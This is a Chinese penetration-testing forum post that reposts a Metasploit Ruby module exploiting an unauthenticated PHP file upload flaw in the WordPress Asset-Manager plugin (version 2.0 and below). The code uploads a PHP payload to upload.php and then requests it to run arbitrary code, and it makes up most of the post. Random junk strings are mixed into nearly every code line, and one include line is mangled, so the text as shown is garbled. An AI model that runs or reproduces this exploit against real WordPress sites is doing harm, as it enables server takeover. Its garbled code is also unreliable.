找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2388|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
) B5 Q/ A3 c  m; R- y& b! O( S# {! |
##
, f/ X" P. A$ [, F' c- s# This file is part of the Metasploit Framework and may be subject to, J, A2 q! {2 |. e3 l6 R- h
# redistribution and commercial restrictions. Please see the Metasploit
) L0 M  G. ~+ G& ~/ Y" a# Framework web site for more information on licensing and terms of use.
5 \( D$ g2 P! [/ r  G6 v) H#   http://metasploit.com/framework/
+ A5 H, ?/ I+ r; ^##
2 m8 h4 U5 q" c" B $ U4 Y1 p- L3 s# s; H' ~
require 'msf/core'4 k# J. c8 Z! h
require 'msf/core/exploit/php_exe'( S6 ]& b. I) S# p% {
) u; o' `1 S2 m$ k2 u
class Metasploit3 < Msf::Exploit::Remote2 ], M9 i% Y3 s: D5 S, Q4 Y' l
  Rank = ExcellentRanking2 @8 o- K1 [9 F# Y! ?0 `' y
+ r! W# y. U7 O$ {/ [, w: R5 U
  include Msf::Exploit::Remote::HttpClient7 ?/ T& `, g2 C5 y$ v* E1 v
  include Msf::Exploit:hpEXE
' B/ M; X0 \* O2 C: c% B" e; k$ P
4 H) _& ~3 k% m+ o) F% s  def initialize(info = {})
8 L# W* c1 Z4 [. ~    super(update_info(info,* L+ H2 j6 U# H
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',! Y0 `3 y+ n: S
      'Description'    => %q{
  D# I/ j: T9 K% Z& X% }: k        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
7 ]2 V2 T8 F/ R9 S: b( A        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
/ @2 b0 {# i3 o        temp directory without authentication, which results in arbitrary code execution.' j4 Q  \& `2 }9 e4 ?
      },
/ `# _/ @1 L/ J# ~4 H+ _' [      'Author'         =>6 Q5 U" ]% h, Z+ s0 A
        [' D& w0 Q0 `6 ^# g, R, t
          'Sammy FORGIT', # initial discovery
2 q8 ~9 g: l: C& C& \% `7 D          'James Fitts <fitts.james[at]gmail.com>' # metasploit module: k; O( r2 }5 R9 K- r5 Y! O) r
        ],' F4 l: C' H3 u' _  ^$ V
      'License'        => MSF_LICENSE,
( q: Y* x3 l/ r- N2 D  A      'References'     =>
: w' v* A  E& ^! Q$ H        [% H3 W! K% f+ ?; u5 t# ~, A
          [ 'OSVDB', '82653' ],) i9 ]2 O' k4 @5 i* T" S
          [ 'BID', '53809' ],8 U/ I1 c) \0 b% }/ Y& k
          [ 'EDB', '18993' ],
2 w- n4 r2 ]  ]; i0 v1 h# e( P1 [          [ 'URL', 'http:// www.myhack58.com /' ]
7 G: ~: f& o7 F$ T        ],+ S) s  O+ `; ]
      'Payload'       =>
5 m" N9 a6 Z& }6 e        {! e4 c0 N( M& j6 R6 ]
          'BadChars' => "\x00",+ w4 V. Z2 D& i7 D. k- r
        },+ K7 @4 U$ x% o9 r1 H
      'Platform'       => 'php',! ^  L3 v: p; g% b/ \
      'Arch'           => ARCH_PHP,
& w' L9 W  ]9 u% m! u      'Targets'        =>
1 [8 ], w9 s0 r2 z6 R) D) G  N4 c        [
) f6 x. v- `" l# {          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],- X1 u# h6 y, f: K% z
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
" `$ L3 m0 m- t        ],) @% b. e7 e& S
      'DefaultTarget' => 0,2 ~9 I# {" z% h, T# o/ V
      'DisclosureDate' => 'May 26 2012'))
, D! t5 P0 o9 A4 T- q* t; G! P+ i/ V - v# e% b, ^) [5 _$ O7 ~! H
    register_options(2 T- Z: _. }, y! w
      [
5 `- N+ e; O5 m( z1 H        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])- T( n  n9 Z- W0 g0 U7 W
      ], self.class)
) A# n& E. y7 k* ^5 q/ v! J2 ]  end
8 L8 ?' M1 K9 T & k9 z: j3 ~8 @- d, q
  def exploit% q5 ^3 [( G* s$ H; L' i
    uri =  target_uri.path; ]; W' u  e8 H% e- K8 }  d) t
    uri << '/' if uri[-1,1] != '/'
; V3 S$ f' S$ ^: c+ ?    peer = "#{rhost}:#{rport}"
& ~) l% t* A- T& a/ [, B0 e    payload_name = "#{rand_text_alpha(5)}.php"' u/ r; p( J2 _+ i  }
    php_payload = get_write_exec_payload(:unlink_self=>true)
& c7 p0 s& x. A# E! D" |
" Q, |0 Y5 {( z! L0 x% K! F) n    data = Rex::MIME::Message.new" K% }% m5 n" x6 P1 @* [, A% B
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")2 [5 i+ I( v+ H) g7 W/ r
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' Z9 k# D$ ^( u! J* Z5 M! @

+ _7 k3 j& ?3 W: I9 w    print_status("#{peer} - Uploading payload #{payload_name}")  Y% e, r) |8 j- h# L4 H. O
    res = send_request_cgi({
3 m1 U/ B- m( U' @      'method'  => 'POST',0 M  Z+ x, `; X+ T" k
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",3 J$ h( z0 {8 ^4 \, p% X
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",; t0 i2 p8 x( h1 w0 H  z2 [. m, s
      'data'    => post_data
# A$ e- `3 r: g    })+ _1 x7 r6 a$ \8 {6 w3 Y4 j/ |* W3 }
9 f5 z/ S" J* q: c
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
4 `3 i$ @) e$ g1 d9 x2 |$ a      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
7 v& h9 X2 q; H7 J6 a1 r3 O# ]+ l# e& Vend
3 C5 y. R) w  O) j$ ~
/ z$ c/ Z* ?) ~' J    print_status("#{peer} - Executing payload #{payload_name}")6 R! F' S' i( s
    res = send_request_raw({
9 ?7 R) a* l* T+ f6 z% q      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",) E- B, P4 t# r( k; P& ~4 B& O( E
      'method'  => 'GET'8 w9 h; m$ G; [; }1 q( @: `
    })# K: m9 k+ O3 w
# ~8 B7 J( I' u- j
    if res and res.code != 200. [7 u* o/ [# R
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
8 q0 l4 o+ Y+ y: ~6 y% ?    end
8 O$ H. J9 Z. H7 }3 G" `5 J  end8 m" H- |, C( K5 c' o! m
end
4 {& H! ]; U/ i
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表